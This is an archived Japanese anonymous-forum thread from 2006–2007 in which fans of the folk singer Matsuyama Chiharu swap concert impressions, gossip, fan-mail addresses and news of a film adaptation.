千春コンサートは今年で2回目だけど、
「大空と〜」は客に歌わせないで自分で歌って欲しいよ
去年もだったし、ちゃんと歌う「大空〜」は永遠に聞けないのか?
しかし、弾き語りコーナーは最強でした♪

254 :NO MUSIC NO NAME:2006/12/01(金) 16:45:18 ID:2b31yWYN
来年は弾き語りだけでやってくれ!

255 :NO MUSIC NO NAME:2006/12/01(金) 22:21:05 ID:l7Gl+S7V
「大空...」は卒業?今回の福岡は「北の大地」でした。
でも、この曲も名曲雄大で良かった〜!

256 :大空と:2006/12/01(金) 22:53:02 ID:ghWztb2v
だから愛知県の蒲郡はお約束のハマジ社長がメインボーカルで歌ったのよm(__)m あと演歌だけは歌わないでくれ!まあコンデェションのこともあると思うけど・・

257 :NO MUSIC NO NAME:2006/12/01(金) 23:16:06 ID:WI25TbZ3
今日の国際フォーラム行ってきた。
何か千春、コンディションいまいちの様子だった。高音出づらいし、良く水飲んでたし。
トークにもいつものキレがなく、グダグダだった・・・。
25年LIVE見続けてるが、今回はワーストかも。
ツアーの疲れが出てるのかな・・・。また来年会いに行くからね、千春!

258 :NO MUSIC NO NAME:2006/12/01(金) 23:30:33 ID:0Ca8rXWu
         .。::+。゚:゜゚。・::。.        .。::・。゚:゜゚。*::。.
      .。:*:゚:。:+゚*:゚。:+。・::。゚+:。   。:*゚。::・。*:。゚:+゚*:。:゚:+:。.
ウワ━.:・゚:。:*゚:+゚・。*:゚━━━━゚(ノД`)゚━━━━゚:*。・゚+:゚*:。:゚・:.━ン!!
  。+゜:*゜:・゜。:+゜                   ゜+:。゜・:゜+:゜*。
.:*::+。゜・:+::*                        *::+:・゜。+::*:.

父さん、聴けました。

259 :NO MUSIC NO NAME:2006/12/02(土) 00:04:22 ID:yw9tW9Ae
季節の旅人、ポッドキャストになったからDLしたけど、
何これ?

著作権の関係上、オープニング、エンディング、
歌はカットしてあります、って。。。。
千春のトークしか入ってないって事なのね。。。

ウォークマンで聞くべきかなあ、、、

260 :荒探しは嫌いだけど:2006/12/02(土) 00:05:09 ID:ghWztb2v
今回のワウワウのライブ季節の中では一番を二回歌ったなんてことはどうでもよい!盛り上がれば・・ていうか人間千春に会えればOKだよな(^^)vこれからもライブ行くじょ

261 :NO MUSIC NO NAME:2006/12/02(土) 22:21:28 ID:wUzT+Xas
258迷惑な書き込みはするな!

262 :NO MUSIC NO NAME:2006/12/05(火) 22:02:15 ID:UyGGa8vM
さっき大阪厚生年金行ってきました。
終演後しばらくして下に降りたら、なんと本人が!!
握手してもらいました!!!

263 :NO MUSIC NO NAME:2006/12/06(水) 20:31:48 ID:+WkPjeT5
それはラッキー!
http://www.my-tube.mobi/search/view.php?id=IozEWLXJ6bE&word=%E6%9D%BE%E5%B1%B1%E5%8D%83%E6%98%A5

264 :NO MUSIC NO NAME:2006/12/06(水) 23:49:20 ID:Ii3LvERf
>>262
居残るもんだね!羨ましい!
一列目では見たけど...昔に会ってみたかったのも本心。


265 :NO MUSIC NO NAME:2006/12/07(木) 16:06:00 ID:8ZTs+qoX
糖尿病だったんだね(;つД`)

266 :NO MUSIC NO NAME:2006/12/07(木) 17:57:21 ID:5U78UmZG
千春は若い頃ラジオで、いちにちコーラ10本は飲むとか言ってたし
缶コーヒー大好きらしいから糖尿になったんかねー
体は大事にしてほしいよ、自分のため、ファンのため

267 :NO MUSIC NO NAME:2006/12/07(木) 23:44:02 ID:5CU/7+hM
千春さんってめちゃめちゃ顔ちっちゃいよね。
楽屋で写真撮ってもらったのを現像して自分がイヤになった。
身長は165センチぐらいしかないけどスタイルというかバランスがいいから
大きく見えるね。

268 :ちー:2006/12/08(金) 03:47:06 ID:RTncWMUP
身長もっとありますよ!168〜くらいはあると思ったな。

269 :NO MUSIC NO NAME:2006/12/08(金) 06:58:59 ID:ZRTXQiz/
167って言ってたよ〜★

270 :NO MUSIC NO NAME:2006/12/08(金) 08:57:06 ID:uVbXQJYa
俺も、ひょんなことから
コンサート後に楽屋へ遊びに行かせていただいたことが
1回だけあるけど
ちっちゃかったな〜、顔!
気さくな方でしたよ

271 :NO MUSIC NO NAME:2006/12/08(金) 12:41:19 ID:2UCG4Hy9
デビュー当時は170cm、52kgと言ってましたけど
本当はそんな小さいのですか。。

コンサートは一部・二部に分かれているようですが
休憩時間とか入ったりする構成なのですか?
今回、初めてのちーさまのライブにドキドキしてますw

272 :NO MUSIC NO NAME:2006/12/08(金) 17:47:05 ID:ZRTXQiz/
ちーさまと連絡取り合ってる人っている?

273 :NO MUSIC NO NAME:2006/12/08(金) 22:24:28 ID:BVxOX5kk
>>268
168あるかは微妙だなあ。
楽屋で一緒に写真撮らせてもらったけど166ぐらいじゃないかな?
みんな初めて会った人達は『顔ちっちゃいけど身長も思ったより小さいね』
とビックリしてたよ。
でも態度も大きいかもしれないけど気さくでいい人だし、大物だよ。

274 :NO MUSIC NO NAME:2006/12/08(金) 23:25:52 ID:12BJ7NMX
東京駅・札幌駅間 片道9,500円のバス・フェリー連絡きっぷ
「パシフィック・ストーリー」 12月15日販売開始!!
http://www.sunflower.co.jp/ferry/news/20061205.shtml

275 :NO MUSIC NO NAME:2006/12/08(金) 23:27:02 ID:RIYybE6z
長ーーーーーーい夜をーーーーー♪

276 :NO MUSIC NO NAME:2006/12/09(土) 00:03:41 ID:2Pam8Ex3
ちーさま、舞台やテレビと大違い。
気さく、無口、温厚・・・でも”バ〜カア〜”の生声、すげー奇麗。あの声3D。
でも生芸能人の中でもオーラが凄く、ド緊張する。

277 :NO MUSIC NO NAME:2006/12/09(土) 10:30:20 ID:dZu9aUbV
あのね↘と下がるとこなんかいいよね。
○○だべとか言いながら政治ネタ、時事ネタも多く考え方にも
共感できる部分が多い。
楽屋にやーさんが表敬訪問に来てることも千春さんならではかな?

278 :NO MUSIC NO NAME:2006/12/10(日) 03:58:24 ID:cJ8noUIf
目の前でバカやろ〜!って言ってもらった☆その声と距離感にドキドキしてしまいました(*^_^*)

279 :NO MUSIC NO NAME:2006/12/10(日) 06:04:46 ID:2EmD+0Ue
よかったですね^^

280 :NO MUSIC NO NAME:2006/12/10(日) 10:30:35 ID:kfjkYXqv
どなたか、松山千春さんの、過去の「毒舌」をアップしてもらえませんか?

281 :NO MUSIC NO NAME:2006/12/10(日) 17:10:36 ID:+ksomj+p
芸能人は金がある奴にはタカる...というのが常らしいが
唯一、おごってもらった芸能人が松山千春・・・と某芸能関係者。
・・・結構キレイな噂しか聞かんよ、その話では、
 恐らくバックメンバーの宇山くんにも、ライブ中、一曲歌わせたら
”お疲れさま!”ってその分の特別報酬を出してあげている...と予想。たぶん?絶対?

282 :NO MUSIC NO NAME:2006/12/10(日) 19:55:49 ID:AvBn4chd
今回のコンサートで売っているポスターの左下は、岩見沢の夜だよね
思い出すなぁ、花火と星空と総立ちのファンと千春の歌、いい夜だった
どうでもいい話すんません

283 :NO MUSIC NO NAME:2006/12/10(日) 20:08:05 ID:qko0LHgN
>>281
そうは思わんな
宇山君を新人として自分の事務所で抱えるなら
何故、コンサートの前座で歌わしてあげないのだろう?
千春の映像を流すくらいやったら
宇山君に、全国のステージの前座で、
2〜3曲歌わせてあげたらいいのにと思う
今のままでは買い殺しだぜ。

284 :NO MUSIC NO NAME:2006/12/10(日) 20:10:14 ID:Ux3xHHCo
>>282
どうでもいい話ではありません、有難う御座います。
行きたかったけど、経済的に無理で諦めました。
だから、当日のこぼれ話は聞きたいし嬉しいです。

285 :NO MUSIC NO NAME:2006/12/10(日) 20:31:11 ID:+ksomj+p
>>283
宇山君を抱えていることのほうが優しい奴だとおもうがな。
言っちゃ悪いがどこの会社が面倒みるよ?
買い殺されるかどうかは宇山君本人の問題。そこそこいい歳になったのだから実力あるなら自分で動く。
 個人的には前座があるなら、それが終わった頃にコンサート会場に行くわ。

286 :NO MUSIC NO NAME:2006/12/10(日) 20:53:45 ID:AvBn4chd
宇山君は千春のコンサートの途中で歌わせたりしてるよ
第一部の最後に丸々歌わせたコンサートもあったと記憶してるけど
千春の移動にあわせて小さなスタジオで歌ってたりしてた時もあった

287 :NO MUSIC NO NAME:2006/12/10(日) 23:00:43 ID:eT6mLsHb
うん、こんなトークバトルはいいなぁ。みんなで意見言い合ってさ!しかし、あのワウワウのライブは毎日見ても全然飽きないぞ(^-^)

288 :NO MUSIC NO NAME:2006/12/10(日) 23:36:42 ID:6W5Ghqg0
宇山君ってギターの人のこと?
途中でよく『おい宇山!ちょっとアレ唄ってみろよ』てな感じで
宇山君も弾き語りで『ギュギュッと♬』とかいう歌詞の曲を何回か
唄ったぜ!

289 :NO MUSIC NO NAME:2006/12/11(月) 00:11:19 ID:dNlyu5q/
割り込みスミマセン;;
21にして、松山千春さんの曲に感銘を受けました。最近は母のテープを勝手に聴きながら家事とかしてます.笑
ファンレターを送りたいのですが、所属事務所のサイトなんかも見つからず何処に送れば良いのやら;;
誰かご存知の方いらっしゃいませんか!
駄文失礼しました↓↓

290 :NO MUSIC NO NAME:2006/12/11(月) 00:31:43 ID:YdClt8lC
千春さんは「オフィスゲンキ」という事務所の社長さんですよ。検索していただければ住所はわかると思います。あなたのような若い方からのファンレターは千春さんもきっと喜んでくれますよ。

291 :NO MUSIC NO NAME:2006/12/11(月) 00:40:52 ID:dNlyu5q/
それが…オフィスゲンキで検索したのですが出てこなくて↓↓
PCから検索したら出ますでしょうかね?

母が元々好きなんですが、今病気で。そんな時、大空と〜を聴いて号泣してしまいました(´;ω:`)

292 :NO MUSIC NO NAME:2006/12/11(月) 01:04:44 ID:YdClt8lC
290です。PCで「千春を見守る会」と検索してみていただけますか?千春さんのファンクラブなのでそこに送ればOKです。自分も会員なのですが出先なもので…住所を暗記してなくてごめんなさい。

293 :NO MUSIC NO NAME:2006/12/11(月) 01:34:48 ID:dNlyu5q/
いえいえ、ご丁寧に本当にありがとうございます!

検索してみます!

294 :TAKAMINE:2006/12/11(月) 04:20:32 ID:vGziznFS
>293様

若い方だから、今まで色々な歌手に夢中になっていたのかな?
でも、ようやく本物の存在に気付いたようですね?
それだけで貴方は見る目があると思います。
ファンの一人として思うのは、若い世代の千春ファンは、歓迎したい存在であると云う事です。
ファンレターを事務所に送るのも一つの手段だと思いますが、我が北海道だけで放送されている、千春が担当するラジオ番組【季節の旅人】に手紙・葉書、もしくはメールを送ってみては如何でしょう?
「手紙やメールには全部目を通している」と千春が仰っていましたしたし、運が良ければ、ラジオで読んで頂けますよ〜(=^ー^)ノ

〒060ー8705
STVラジオ 松山千春【季節の旅人】係

メールならこちらへ
chiharu@stv.ne.jp


295 :293:2006/12/11(月) 07:35:06 ID:dNlyu5q/
他のアーティストさんにも好きなのはおりますが(主にrock)、フォークでここまで気持ちが揺さぶられたのは初めてです。

そうなんですか!
私は関西なので聞く事は出来ませんが、目を通して頂いている事実だけで感激ですものね。

ありがとうございます!

296 :NO MUSIC NO NAME:2006/12/11(月) 08:36:21 ID:YdClt8lC
295さん、ラジオ番組「季節の旅人」はPCで聞けるようになったのです(^^)ポッドキャストで。千春さんの楽しいトークを一度聴いてみて下さい。そしていつかはコンサートにも。千春さんの生歌は震えるほど感動ですよ。元気ももらえます。

297 :NO MUSIC NO NAME:2006/12/11(月) 12:12:57 ID:fgDgTFom
オフィス・ゲンキ株式会社
本社:〒150−0031
東京都渋谷区桜丘町3番24号 カコー桜丘ビル3−B

札幌支社:〒060−0042
札幌市中央区大通西10丁目4番地 南大通ビル4階



298 :NO MUSIC NO NAME:2006/12/11(月) 13:15:44 ID:dNlyu5q/
わわ、297様、ありがとうございます!!

299 :NO MUSIC NO NAME:2006/12/11(月) 16:18:02 ID:fgDgTFom
どういたしまして お安い御用です

300 :NO MUSIC NO NAME:2006/12/11(月) 21:09:38 ID:2XVGPvgP
300

301 :NO MUSIC NO NAME:2006/12/16(土) 21:04:40 ID:DAPxZaxU
今日は沖縄でバースディゴルフでした

302 :NO MUSIC NO NAME:2006/12/20(水) 23:26:03 ID:GIQ4dwGL
今日から道内ツアーだぁ

303 :NO MUSIC NO NAME:2006/12/21(木) 23:56:29 ID:SG6An4ai
千春FCよりクリスマスカードとプレゼント到着!サンキューです!

304 :NO MUSIC NO NAME:2006/12/22(金) 01:08:02 ID:R2MOOmm1
千春FCやグッズ、センスないのはわかりますが
それにしてもドレもコレも人に見られて恥ずかしいものばかり・・・
ご本人はとても素敵な方なのに・・・うれしくもないし何にもいらない。

305 :NO MUSIC NO NAME:2006/12/22(金) 21:56:34 ID:LQp7CPye
道内ツアーかぁ〜
いいなぁ〜…やっぱ千春は生で聴くのが一番だべ!?

http://blog.duogate.jp/alfeemiyuki/

306 :NO MUSIC NO NAME:2006/12/23(土) 20:30:12 ID:0rf0Tm0d
母が「松山千春の北海道だけの曲をアルバムにしたCDが
欲しい」ってうるさいんですが、アマゾンで探してもありませんでした。
そんなCDでてるんでしょうか?
出てるとしたらなんてタイトルかわかりますか?

307 :NO MUSIC NO NAME:2006/12/23(土) 22:31:53 ID:tB6ClkeY
楽曲配信が1/24から始まるので、そこから選んでオリジナルを作ってはどうでしょう
どんな曲が配信になるかはわかりませんが・・

12/24にHPで発表になります

308 :イタコの千春 ◆tpLqwERCIU :2006/12/26(火) 01:00:39 ID:sQrSpJgW
もう何年前になるかな。ワカメスープをだな。
サダと一緒に食ってるところをだな。
みゆきに見られたんだよ。あれは気まずかった。
当時はな。

今となっては、懐かしい思い出だな。

俺は、フォークシンガーであってだな、ビジュアルなんて関係ないのにな。
当時は若かった。

行かないでって思っても、去っていく、抜けていくんだから仕方ない。

自然の摂理に任せてと、言い聞かせても悩み尽きない時代だったな。
こうやってスキンヘッドにしたのも、かなり勇気いったんだぞ。

この美しい顔だち。例えようもない美しい顔だちの千春ちゃんとしては、
それなりに悩んだ末のスキンヘッド。
 でも、後悔してないから。
例え、髪の毛が無くなっても、やっぱり美しいな。俺^^。

      笑うな     ボケ。

  
みゆきへ、おまえも天才界の住人だ。俺が認める。でも、なぜ拒否るのだ。
考え直してくれ、いつまでも待っている。

サダへ、生え際が下がってきてるぞ、普通は上がるもんだろ。食猛火?
うん、どうでもいいけどな。 それから、お前の【駅舎】って曲 あれいいな。
俺が創った”挫折”に少しだけ匹敵する名曲だべ。暇があったら、一緒に唄おう。
お前が吹っ飛ばないように、手加減するから。


以上。         @千春

309 :NO MUSIC NO NAME:2006/12/26(火) 14:37:01 ID:SF8SwQbq
>>308
いいまわしが全然違うから楽しく無い。”ボケ。”なんて言う事は無い。もっと勉強するように。

310 :NO MUSIC NO NAME:2006/12/27(水) 20:56:29 ID:qvuwlN/3
うん、イタコの千春はだいぶメッキ剥がれてきたな もっと学習せえよ、だべぇ〜

311 :NO MUSIC NO NAME:2006/12/27(水) 21:43:24 ID:J3VLnT54
別人だと割り切って読むとおもしろい

312 :NO MUSIC NO NAME:2006/12/27(水) 22:01:50 ID:lv+dUxX4
>>308
カズマサの登場。

313 :暢子(ヨウコ):2006/12/27(水) 23:21:40 ID:Q8y6AMc7
初めまして。私は15歳です☆
今年の7月22日に、名古屋レインボーホールに母親に連れて行かれてから大ファンになりました。
その日のコンサートのチケットは母親が大好きだからと言う理由で、私が母親のためにコンサートのチケットを取ったのですが、
何故かしら私が行くことになったんです...。
それまでは、正直言ってテレビを見ている限りいつも強気で自分がフォークシンガーで一番と言う考えに、理解できず、母親が好きな理由がわからずにいました。。
しかし、コンサートを実際に聞いて考えが変わりました...。
松山千春さんコンサートで「旅立ち」を聴いて私は感動して本気で泣きました...。
その前に千春さんの恩師のVTRを見たからだとも思いますが、人の曲に初めて感動して泣きました。
それからどっぷりはまってしまい、
最近では部屋にコンサートで買ったアルバムに付いてきたポスターを貼り、
アルバム「再生」を毎日聞いて、今は最新シングルの「祈り」にはまってます。

さすがに私のようなガキが千春さんのファンになる事っておかしいでしょうか??
特にファンレター送ることって千春さんにとってご迷惑でしょうか??

長々と書いてしまい誠に申し訳ありません...。

ご迷惑でなければ出いいのですが、
これからもこの掲示板に書き込んでもよろしいでしょうか??

314 :NO MUSIC NO NAME:2006/12/28(木) 11:15:49 ID:zEaBTDmd
>>313
千春さんはファンを選んだりしませんよ。
それよりも15歳の子がコンサートに来てファンになってくれたことに嬉しく思っていると思います。
マスコミでは千春さんの毒舌だけをクローズアップして放送していますが、実際は弱い者の見方で心広い人間です。
そして、誰よりも本当にファンを大切にしているのが千春さんです。
ファンになること、ファンレターを書くことが千春さんも嬉しいし、僕たち千春ファンも大変嬉しく思います。

●千春さんの公式HPです。
http://columbia.jp/~chiharu/

●千春さんのラジオ番組STVラジオ「季節の旅人」 毎週日曜日午前11時からSTVラジオにて放送中

このラジオ放送は北海道のみの放送なので、
http://www.stvr.jp/netmembers/ よりポッドキャスティングで聞けます。

番組内の千春さんへのメールの送り先 
chiharu@stv.ne.jp <chiharu@stv.ne.jp>

ハガキの郵送先 〒060-8705 STVラジオ 松山千春「季節の旅人」

ちなみに千春さんは送ってきたハガキ、メールは全部目を通していますよ。

●ファンサイト
「千春ファンの交流広場」
www.noble.knc.ne.jp/home.html

「着ぐるみアンの千春応援団」
an.lib.net/chiharu
 

315 :NO MUSIC NO NAME:2006/12/28(木) 13:58:48 ID:jPtj14sH
「足寄より」映画化決定!誰がやるん?千春役

316 :NO MUSIC NO NAME:2006/12/28(木) 18:27:19 ID:vv9mspH0
>>315
ソース貼りなされw

317 :NO MUSIC NO NAME:2006/12/28(木) 19:16:23 ID:eGSltozY
>>316

http://headlines.yahoo.co.jp/hl?a=20061228-00000018-nks-movi

318 :暢子(ヨウコ):2006/12/28(木) 20:56:12 ID:EyImjIeO
書き込みに対しての返事ありがとうございます☆
私自身ファンレターを送ろうかどうか迷ってたんです...、
ガキが面白半分で送ってるって勘違いされているのではないかって思ってたので...。
だからためらってたんですが、NO MUSIC NO NAMEさんのおかげで送ろうと思います☆
でもやっぱり15歳が千春さんのファンになる事って異例ですよね...。
千春さんの歌詞って私にはまっすぐに突き刺さるような感じがするんです。
特に「時代」の、
「生きているから恥ずかしいのか 恥ずかしいから生きているのか
それでもお前には明日がある 悲しい事にお前には明日がある」や、
「愛にも夢にも裏切られた 本当は自分が裏切ってた」
この歌詞に対しては、今でもゆがんだ気持ちに歯止めがかかるようなそんな感じがするんです!!
だから私は周りからなんと言われようがこれからも松山千春さんのファンでいようって決めたんです☆ 

それに私、勘違いしてたんです。

千春さんはずっと自意識過剰で言いたい事ばかり言っている人だと思ってたのですが、
私が行ったコンサート当時北朝鮮からテポドン??が発射されて、堂々と金正日や小泉前首相のことを批判している姿を見て、
「自分の信念を貫き通して話しているんだなぁ」って思ってそんな姿に余計に感動しました☆。
だから私は、千春さんの事を歌手としてももちろん好きですし、人として、人生の先輩として尊敬できる素晴らしい人だって思います!!
私だけかもしれませんね...(照)ここまで崇拝する人間...。

319 :NO MUSIC NO NAME:2006/12/29(金) 13:36:59 ID:gRJ9u39R
いえいえ、他にもたくさん熱狂的な千春信者の方がいらっしゃいますから安心して下さい。
私自身ご本人にお会いしたこともありますが、コンサートやマスコミ向けの時の過激な毒舌トークとは違い、
物腰が柔らかでとてもおだやかで心の広いやさしい人だなと私は感じました。(もちろん贔屓目抜きで)
たぶんどちらも本物の松山千春だろうし、だからこそあれだけの多彩な詩やメッセージの伝え方が
できるのだと思います。)さらに色々な方面に交際範囲の広い方なので、時には強面の人やアウトローの
方達との接点もあると思いますが、それに対してバッシングを受けたり批判をされたりしても、
自分が信じた好きな人とは自分のマイナスになることを承知でも付き合いを続けることのできる
信念を持った懐の広い人だと感じてます。その反面、いくら利益や自分の得になっても、
合わないを思った人や嫌いな人とは深い付き合いはされないタイプなので、
その辺りがアウトロー関係の方にもファンが多い理由のひとつじゃないかなと思います。
だから松山千春の何に共鳴したり共感したりするかは人それぞれですが、貴方のようなお若い方達にも
ファンが繋がって行くことを非常に昔からのファンのひとりとしてうれしく思います。
これからもできればコンサートに行って人間松山千春をたくさん感じて、ようこさんの
人生の参考書のひとつにして下さい。



320 :暢子(ヨウコ):2006/12/29(金) 20:36:16 ID:JYpfPmVJ
はい☆
勿論、コンサートに行く機会があればどんな事があっても行くつもりです☆
いろんな曲を歌われていてはまってからはすごく入りやすかったですもん!!
なかなかいないけれどこれから1人でも私の友達で千春さんの信者を増やしたいと思います☆

それと今日千春さん宛にファンレター送りました☆
この師走の時期に凄く迷惑だからすごく迷ったけれど今年の事は今年中に伝えたくて...☆


321 :名古屋のクラ:2006/12/30(土) 19:46:07 ID:HTth8D0i
暢子こんにちわ!今教科書にも千春の曲のってるから子供もしってるよ☆どんどんはまってくださいなぁ。私もレインボーで明日のためにで痺れました(^^)v

322 :NO MUSIC NO NAME:2007/01/02(火) 18:00:58 ID:tA78NeEf
田中美里さん、祈りのPV出演

http://toho-ent-misato.blogzine.jp/

どこで見られるんだろ

323 :NO MUSIC NO NAME:2007/01/04(木) 22:56:27 ID:FRK9tNKa
千春さんのライブって毎年秋にしかやらないんですか?

324 :NO MUSIC NO NAME:2007/01/05(金) 00:29:24 ID:IEfP3CTX
毎年、春と秋にコンサートツアーがありますよ。

325 :NO MUSIC NO NAME:2007/01/05(金) 19:04:39 ID:/4Y88UY1
千春のライブ行ったら、この次も行かなきゃ〜ってなるよ、絶対
で、チケット争奪戦に参加して抽選はずれてガックシなんて事もある
まぁチケットの入手方法はいろいろあるけどね
例えば、オークションで高い金払ってでも見る価値は間違いなくある

326 :NO MUSIC NO NAME:2007/01/05(金) 22:00:49 ID:+eQ1nShZ
>>313(呻子さん)
千春の良さは奥が深いのでイケメン時代と違い、
今は会場まで足を運ばないと分かり難いです。
「見てくれで判断するな」の典型人?の様な人。
でも、15歳にして心眼を持つ貴方に感服しました。
千春のファンとして、貴方の感想とても嬉しいです。
千春も聞いたら同じ気持の筈、どうも有難う!


327 :NO MUSIC NO NAME:2007/01/05(金) 23:39:40 ID:Bu2D8rnt
>>326さんに
悪気は無いのですが、見てくれかなり良いでしょう!そう思っているのは私だけでは無い筈。色気があるよ。


328 :NO MUSIC NO NAME:2007/01/06(土) 19:50:00 ID:jb/KxWpW
今、見てくれ良いよ!ただ髭をもうちょっとな。若いときでは伝説の5万人ライブ(札幌競技場)の時がいい顔してたなぁ〜

329 :NO MUSIC NO NAME:2007/01/08(月) 20:31:32 ID:+bHIMlfb
下田逸郎
http://bubble4.2ch.net/test/read.cgi/natsumeloj/1168004578

「踊り子」の作詞・作曲

330 :暢子(ヨウコ)のぶこって入力するとこの漢字でますよ☆:2007/01/09(火) 01:47:29 ID:w8zKgjo/
皆様、新年明けましておめでとうございます☆
まだまだ松山千春さんファンになってから短いですが今後とも宜しくお願い致します☆

名古屋のクラさんへ☆
今は教科書にも乗っているのですか??凄いですね☆やはり千春さんは凄い偉大な方なんだなって
改めて思いました☆千春さんの曲を毎日聞いていて聞けば聞くほどジーンとしてしまう自分がいるんですよ...(恥)

326への返事です☆
本当に恐縮です...。私はまだまだ千春さんのファン初心者ですのでなかなか大きな
口はたたけませんが、凄く嬉しいです☆この近くだと私の両親としか千春さんの良さや会話が出来なくて、
残念な限りです...。こちらこそ有り難うございます☆
私は、私はまだ学生ですのでなかなか自分でコンサートに行くという生意気な事は出来ないけれど、
いつか絶対行きたいんですもう一度☆でも、千春さんのコンサートは春と秋ですが、名古屋は真ん中辺りなので、
なかなかスケジュールが合わずこの間の秋のコンサートに行く事が出来ず本当に悔しい限りです...(涙)
一度千春さんの出身の北海道でコンサートを見てみたいです☆やっぱり千春さん自身の出身地であれば、
地方公演よりもテンション高いだろうし、本場で見たいって感じしますから☆
皆さんは一度は北海道でご覧になったのでしょうか??もしよろしければそのときの感想なんて書き込みしていただけると
幸いです☆

話は変わりますが、30周年記念コンサート「再生」がDVDになって発売されるという話を風のウワサで耳にしました。
いつ発売でいくらほどの値段で購入できるかわかる方、教えていただけないでしょうか??

331 :NO MUSIC NO NAME:2007/01/09(火) 09:17:27 ID:oqzZoCay
>>330
ttp://columbia.jp/~chiharu/

332 :NO MUSIC NO NAME:2007/01/09(火) 18:20:57 ID:avMuOaEe
若い人がひとりでも千春ファンのなるのは、なんとも嬉しいものである
ま、我々が若いとき受けていた、千春からの歌や語りからのメッセージは、
今もなんら変わってはいないから、今の若い人が影響うけても不思議ではないけどね

333 :NO MUSIC NO NAME:2007/01/11(木) 00:17:02 ID:yrqiUWHW
333

85 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)